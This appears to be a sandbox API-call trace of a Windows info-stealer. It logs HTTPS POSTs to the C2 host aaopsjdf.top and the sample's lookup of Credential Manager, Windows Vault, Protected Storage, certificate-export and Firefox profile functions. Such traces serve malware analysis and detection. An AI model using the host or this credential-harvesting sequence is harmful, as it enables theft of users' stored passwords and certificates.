Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close ŸÐµA, url = aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/ False 1
Fn
Inet Send HTTP Request headers = Connection: close ŸÐµA, url = aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/ True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 192 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:59:11 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close , url = aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/ False 1
Fn
Inet Send HTTP Request headers = Connection: close , url = aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/ True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 192 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Mutex Create mutex_name = D3F6CAB61E96B029AD170EEF2C2F89C2 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY True 2
Fn
Data
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FileTimeToLocalFileTime, address_out = 0x759de29e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FileTimeToDosDateTime, address_out = 0x759ec86d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempFileNameW, address_out = 0x759fd1b6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalUnlock, address_out = 0x759ecfdf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x759d168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x759d196e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x759d18f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x759d1826 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x759eeceb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynA, address_out = 0x759e192a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x759fd556 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x759d5a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x759d1700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x759d1909 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetPrivateProfileIntW, address_out = 0x759f298b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetPrivateProfileStringW, address_out = 0x759dea48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetPrivateProfileSectionNamesW, address_out = 0x75a4a1ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x759d43e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDllDirectoryW, address_out = 0x75a5004f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x759ec807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisableThreadLibraryCalls, address_out = 0x759d48e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandle, address_out = 0x759d53ae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalLock, address_out = 0x759ed0a7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerW, address_out = 0x758d7647 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x7774b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyExW, address_out = 0x777546c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumValueW, address_out = 0x777548cc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x7774df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x77787481 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyW, address_out = 0x77752459 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleInitialize, address_out = 0x75afefd7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoTaskMemFree, address_out = 0x75b36f41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x75afeba1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = GetHGlobalFromStream, address_out = 0x75b041d5 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIA, address_out = 0x7637d250 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIA, address_out = 0x7637d11c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7638bb71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrRChrIW, address_out = 0x763ae782 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CertOpenSystemStoreW, address_out = 0x7627c8d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CertCloseStore, address_out = 0x7624dd10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x76275a7f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = PFXExportCertStoreEx, address_out = 0x762d1061 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CertEnumCertificatesInStore, address_out = 0x7624e33a True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x75690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 True 1
Fn
Module Load module_name = MSVCRT.dll, base_address = 0x75e70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcrt.dll, function = memcpy, address_out = 0x75e79910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcrt.dll, function = _adjust_fdiv, address_out = 0x75f132ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcrt.dll, function = strchr, address_out = 0x75e7dbeb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcrt.dll, function = memmove, address_out = 0x75e79e5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcrt.dll, function = malloc, address_out = 0x75e79cee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcrt.dll, function = atoi, address_out = 0x75e7dbe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcrt.dll, function = _vsnwprintf, address_out = 0x75e7bbce True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcrt.dll, function = _vsnprintf, address_out = 0x75e7d1a8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcrt.dll, function = memset, address_out = 0x75e79790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcrt.dll, function = _initterm, address_out = 0x75e7c151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcrt.dll, function = free, address_out = 0x75e79894 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = FindFirstUrlCacheEntryW, address_out = 0x75f5978a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = DeleteUrlCacheEntryW, address_out = 0x75f79573 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = FindCloseUrlCache, address_out = 0x75f68409 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = FindNextUrlCacheEntryW, address_out = 0x75f5989c True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Module Load module_name = Pstorec.dll, base_address = 0x74f10000 True 1
Fn
Module Get Address module_name = Unknown module name, function = PStoreCreateInstance, address_out = 0x74f1526c True 1
Fn
COM Create interface = AFA0DC11-C313-11D0-831A-00C04FD5AE38, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = vaultcli.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = VaultOpenVault, address_out = 0x74ea26a9 True 1
Fn
Module Get Address module_name = Unknown module name, function = VaultCloseVault, address_out = 0x74ea2718 True 1
Fn
Module Get Address module_name = Unknown module name, function = VaultEnumerateItems, address_out = 0x74ea3099 True 1
Fn
Module Get Address module_name = Unknown module name, function = VaultGetItem, address_out = 0x74ea3242 True 2
Fn
Module Get Address module_name = Unknown module name, function = VaultFree, address_out = 0x74ea4321 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Mozilla True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Mozilla False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs False 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox False 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US), value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US), value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main, value_name = PathToExe, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main, value_name = PathToExe, data = 67 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox, type = file_attributes True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, desired_access = FILE_READ_ATTRIBUTES True 1
Fn
Ini Enumerate Sections file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, data_out = General, size = 65000 True 1
Fn
Ini Read file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default True 1
Fn
